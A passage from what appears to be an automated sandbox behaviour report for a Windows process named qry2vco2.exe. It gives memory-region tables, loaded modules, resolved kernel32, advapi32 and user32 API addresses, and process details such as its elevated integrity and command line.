| private_0x00000000003c0000 | 0x003c0000 | 0x003cffff | Private Memory | rw |
|
|
|
- |
| qry2vco2.exe | 0x00400000 | 0x00476fff | Memory Mapped File | rwx |
|
|
|
- |
| locale.nls | 0x00480000 | 0x0053dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000540000 | 0x00540000 | 0x0063ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000640000 | 0x00640000 | 0x0078ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000640000 | 0x00640000 | 0x0071ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000780000 | 0x00780000 | 0x0078ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000790000 | 0x00790000 | 0x00917fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000920000 | 0x00920000 | 0x00aa0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000ab0000 | 0x00ab0000 | 0x01eaffff | Pagefile Backed Memory | r |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x740d0000 | 0x74161fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x742f0000 | 0x742f7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x74ab0000 | 0x74abbfff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x74da0000 | 0x74de3fff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x74df0000 | 0x74f0ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x74f10000 | 0x74f3afff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x75030000 | 0x7517cfff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x75180000 | 0x7518efff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x75310000 | 0x766cefff | Memory Mapped File | rwx |
|
|
|
- |
| comdlg32.dll | 0x766d0000 | 0x7678dfff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x76790000 | 0x76c6cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x76c70000 | 0x76daffff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x77260000 | 0x772a3fff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x77300000 | 0x7738cfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x77390000 | 0x77549fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x77550000 | 0x775cafff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007feb0000 | 0x7feb0000 | 0x7ffaffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffd8000 | 0x7ffd8000 | 0x7ffdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ffc57b4ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (8)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIIHMN~1\AppData\Local\Temp\qRY2vco264.exe | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 73 |
|
1 |
Module (165)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | KERNEL32.DLL | base_address = 0x74f40000 |
|
1 | |
| Load | ADVAPI32.dll | base_address = 0x77550000 |
|
1 | |
| Load | COMDLG32.dll | base_address = 0x766d0000 |
|
1 | |
| Load | GDI32.dll | base_address = 0x75030000 |
|
1 | |
| Load | USER32.dll | base_address = 0x76c70000 |
|
1 | |
| Load | VERSION.dll | base_address = 0x742f0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x74f40000 |
|
2 | |
| Get Handle | mscoree.dll | - |
|
1 | |
| Get Filename | - | process_name = c:\users\ciihmnxmn6ps\desktop\qry2vco2.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\Desktop\qRY2vco2.exe, size = 260 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEvent, address_out = 0x74f660c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForSingleObject, address_out = 0x74f66110 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeviceIoControl, address_out = 0x74f587e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DuplicateHandle, address_out = 0x74f65f30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FormatMessageW, address_out = 0x74f64a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventW, address_out = 0x74f65fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateProcessW, address_out = 0x74f5a510 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExpandEnvironmentStringsW, address_out = 0x74f5c8c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDriveTypeW, address_out = 0x74f66300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemDirectoryW, address_out = 0x74f59a90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteFileW, address_out = 0x74f661b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadErrorMode, address_out = 0x74f5fae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapSize, address_out = 0x77704f40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringW, address_out = 0x74f59a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStringTypeW, address_out = 0x74f579b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateThread, address_out = 0x74f5fcb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OpenProcess, address_out = 0x74f592b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetVersion, address_out = 0x74f5a300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateFileW, address_out = 0x74f66180 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindResourceW, address_out = 0x74f63a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SizeofResource, address_out = 0x74f58cb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseHandle, address_out = 0x74f65f20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetLastError, address_out = 0x74f52af0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadResource, address_out = 0x74f578f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x74f52db0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x74f52da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LockResource, address_out = 0x74f57a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCommandLineW, address_out = 0x74f5a4b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleW, address_out = 0x74f59660 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryW, address_out = 0x74f5a0b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStdHandle, address_out = 0x74f5a060 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalFree, address_out = 0x74f587c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalAlloc, address_out = 0x74f58840 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcAddress, address_out = 0x74f57940 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleFileNameW, address_out = 0x74f59560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleScreenBufferInfo, address_out = 0x74f669c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileType, address_out = 0x74f66390 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OutputDebugStringW, address_out = 0x74f81c30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleW, address_out = 0x74f668e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteConsoleW, address_out = 0x74f66920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFilePointerEx, address_out = 0x74f66540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnterCriticalSection, address_out = 0x776f5e80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LeaveCriticalSection, address_out = 0x776f5e00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetStdHandle, address_out = 0x74f826a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x776eda90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EncodePointer, address_out = 0x7770f190 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DecodePointer, address_out = 0x7770a200 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitProcess, address_out = 0x74f674f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleExW, address_out = 0x74f59fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = MultiByteToWideChar, address_out = 0x74f52d60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WideCharToMultiByte, address_out = 0x74f575a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x74f525e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleMode, address_out = 0x74f66870 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleInputA, address_out = 0x74f668c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleMode, address_out = 0x74f66900 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThread, address_out = 0x74f59700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThreadId, address_out = 0x74f51b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitThread, address_out = 0x77712570 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryExW, address_out = 0x74f57920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteCriticalSection, address_out = 0x77709920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushFileBuffers, address_out = 0x74f662a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteFile, address_out = 0x74f66590 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleCP, address_out = 0x74f66860 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x74f5a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x74f59680 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadFile, address_out = 0x74f664a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStartupInfoW, address_out = 0x74f5a080 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = UnhandledExceptionFilter, address_out = 0x74f828e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetUnhandledExceptionFilter, address_out = 0x74f5a2c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionAndSpinCount, address_out = 0x74f66020 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Sleep, address_out = 0x74f577b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateProcess, address_out = 0x74f5fbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsAlloc, address_out = 0x74f59a70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsGetValue, address_out = 0x74f51ba0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsSetValue, address_out = 0x74f51da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsFree, address_out = 0x74f59930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidCodePage, address_out = 0x74f5a090 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetACP, address_out = 0x74f58770 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetOEMCP, address_out = 0x74f5fd10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCPInfo, address_out = 0x74f59fc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x74f57910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = RtlUnwind, address_out = 0x74f59a80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = QueryPerformanceCounter, address_out = 0x74f52dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x74f51d90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemTimeAsFileTime, address_out = 0x74f52b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetEnvironmentStringsW, address_out = 0x74f5a3b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeEnvironmentStringsW, address_out = 0x74f5a0f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapReAlloc, address_out = 0x776ebae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEndOfFile, address_out = 0x74f664f0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetTokenInformation, address_out = 0x7756ed40 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegDeleteKeyW, address_out = 0x7756fca0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupPrivilegeValueW, address_out = 0x775695e0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = AdjustTokenPrivileges, address_out = 0x77570680 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = OpenProcessToken, address_out = 0x7756ee90 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegSetValueExW, address_out = 0x7756f0a0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegQueryValueExW, address_out = 0x7756ed60 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyExW, address_out = 0x7756ed80 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyW, address_out = 0x7756f590 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCreateKeyW, address_out = 0x775706c0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCloseKey, address_out = 0x7756efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupAccountSidW, address_out = 0x7756f7b0 |
|
1 | |
| Get Address | c:\windows\syswow64\comdlg32.dll | function = PrintDlgW, address_out = 0x766dc6a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartPage, address_out = 0x750dee10 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndDoc, address_out = 0x750b55a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartDocW, address_out = 0x750b57e0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = SetMapMode, address_out = 0x750b9590 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = GetDeviceCaps, address_out = 0x750b0820 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndPage, address_out = 0x750dfbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SendMessageW, address_out = 0x76c838f0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = DialogBoxIndirectParamW, address_out = 0x76c9b6b0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = EndDialog, address_out = 0x76c9b430 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = LoadCursorW, address_out = 0x76c87740 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = InflateRect, address_out = 0x76c974e0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetSysColorBrush, address_out = 0x76c9efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetCursor, address_out = 0x76ca4ed0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetWindowTextW, address_out = 0x76c94580 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetDlgItem, address_out = 0x76c91540 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoW, address_out = 0x742f1580 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = VerQueryValueW, address_out = 0x742f1500 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoSizeW, address_out = 0x742f1560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsAlloc, address_out = 0x74f5a330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsFree, address_out = 0x74f5f400 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsGetValue, address_out = 0x74f57580 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsSetValue, address_out = 0x74f59910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x74f66030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventExW, address_out = 0x74f65f90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x74f65ff0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x74f5a5d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x74f5a690 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x776e40f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x776dd630 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x776decf0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x74f65720 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolWait, address_out = 0x776de140 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x776deb60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x77719990 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x77715540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x77709dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x74f5a550 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x74f80a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x752c0790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x74f5f8a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CompareStringEx, address_out = 0x74f5fa30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDateFormatEx, address_out = 0x74f81030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x74f5a000 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTimeFormatEx, address_out = 0x74f814b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x74f5a4f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidLocaleName, address_out = 0x74f816f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringEx, address_out = 0x74f59970 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentPackageId, address_out = 0x75243c90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTickCount64, address_out = 0x74f58710 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsWow64Process, address_out = 0x74f596e0 |
|
1 |
System (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2019-01-23 14:11:50 (UTC) |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Process #107: qry2vco2.exe
175
0
| Information | Value |
|---|---|
| ID | #107 |
| File Name | c:\users\ciihmnxmn6ps\desktop\qry2vco2.exe |
| Command Line | qRY2vco2.exe -accepteula "Journal.exe" -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:02:17, Reason: Child Process |
| Unmonitor | End Time: 00:02:23, Reason: Self Terminated |
| Monitor Duration | 00:00:06 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xa0c |
| Parent PID | 0xe38 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
EE8
0x
610
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00023fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x0009ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000a0000 | 0x000a0000 | 0x0019ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x001b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001c1fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x001d0000 | 0x0028dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000290000 | 0x00290000 | 0x002cffff | Private Memory | rw |
|
|
|
- |
| imm32.dll | 0x002d0000 | 0x002f9fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000002d0000 | 0x002d0000 | 0x002d0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002e0000 | 0x002e0000 | 0x002effff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000310000 | 0x00310000 | 0x0031ffff | Private Memory | rw |
|
|
|
- |
| qry2vco2.exe | 0x00400000 | 0x00476fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x006fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x0057ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000600000 | 0x00600000 | 0x006fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000700000 | 0x00700000 | 0x0083ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000840000 | 0x00840000 | 0x009c7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000009d0000 | 0x009d0000 | 0x00b50fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000b60000 | 0x00b60000 | 0x01f5ffff | Pagefile Backed Memory | r |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x740d0000 | 0x74161fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x742f0000 | 0x742f7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x74ab0000 | 0x74abbfff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x74da0000 | 0x74de3fff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x74df0000 | 0x74f0ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x74f10000 | 0x74f3afff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x75030000 | 0x7517cfff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x75180000 | 0x7518efff | Memory Mapped File | rwx |
|
|
|
- |
